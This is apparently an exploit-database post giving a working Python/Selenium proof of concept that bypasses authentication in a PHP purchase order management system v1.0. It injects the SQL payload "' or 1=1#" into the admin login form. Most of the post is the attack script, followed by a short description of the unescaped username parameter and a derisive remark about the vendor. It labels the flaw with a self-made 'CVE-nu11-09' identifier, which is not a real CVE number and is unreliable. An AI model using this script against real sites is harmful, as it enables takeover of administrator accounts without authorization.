### Exploit Title: POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication. ### Author: nu11secur1ty ### Testing and Debugging: nu11secur1ty ### Date: 09.09.2021 ### Vendor: https://www.sourcecodester.com/user/257130/activity ### Link: https://www.sourcecodester.com/php/14935/purchase-order-management-system-using-php-free-source-code.html#comment-form ### CVE: CVE-nu11-09 [+] Exploit Source: #!/usr/bin/python # Author @nu11secur1ty import time from selenium import webdriver from selenium.webdriver.chrome.options import Options from colorama import init, Fore, Back, Style init(convert=True) options = webdriver.ChromeOptions() options.headless = True driver = webdriver.Chrome(options=options) PoC = 'http://localhost/purchase_order/admin/login.php' driver.get(PoC) #enter your login username username="nu11secur1ty' or 1=1#" #enter your login password password="nu11secur1ty' or 1=1#" # test the exploit username #username="test" # test the exploit password #password="blavsdfdfaaa" #enter the element for username input field element_for_username="username" #enter the element for password input field element_for_password="password" try: ### 0 username_element = driver.find_element_by_name(element_for_username) username_element.send_keys(username) password_element = driver.find_element_by_name(element_for_password) password_element.send_keys(password) time.sleep(1) driver.execute_script("document.querySelector('[class=\"btn btn-primary btn-block\"]').click()") print(Fore.RED + 'The payload for CVE-nu11-09 is deployed and your admin account is PWNED by SQL - Injection\n') print(Fore.GREEN + 'Please see the screenshot poc.png to see if your exploit is working =) BR @nu11secur1ty\n') print(Style.RESET_ALL) time.sleep(3) S = lambda X: driver.execute_script('return document.body.parentNode.scroll'+X) driver.set_window_size(S('Width=1024'),S('Height=720')) # May need manual adjustment driver.find_element_by_tag_name('body').screenshot('poc.png') driver.quit() except Exception: #### This exception occurs if the element are not found in the webpage. print("Some error occured :(") ------------------------------------------------------------------ ### Description: The POMS-PHP (by: oretnom23 ) v1.0 is vulnerable to remote SQL-Injection-Bypass-Authentication for the admin account in app /purchase_order/classes/Login.php. remote SQL-Injection-Bypass-Authentication: https://portswigger.net/support/using-sql-injection-to-bypass-authentication. The parameter (username) from the login form is not protected correctly and there is no security and escaping from malicious payloads. When the user will sending a malicious query or malicious payload to the MySQL server, he can bypass the login credentials and take control of the admin account. ------------------------------------------------------------------- ### CONCLUSION: This vendor must STOP creating all these broken projects and vulnerable software programs, probably he is not a developer! ### BR - [+] @nu11secur1ty System Administrator - Infrastructure and Penetration Testing Engineer ------------------------------------------------------------------- ### Reproduce: https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/CVE-nu11-09 ### Proof: https://streamable.com/47kd87 ### BR nu11secur1ty -- System Administrator - Infrastructure Engineer Penetration Testing Engineer Exploit developer at https://www.exploit-db.com/ https://www.nu11secur1ty.com/ hiPEnIMR0v7QCo/+SEH9gBclAAYWGnPoBIQ75sCj60E= nu11secur1ty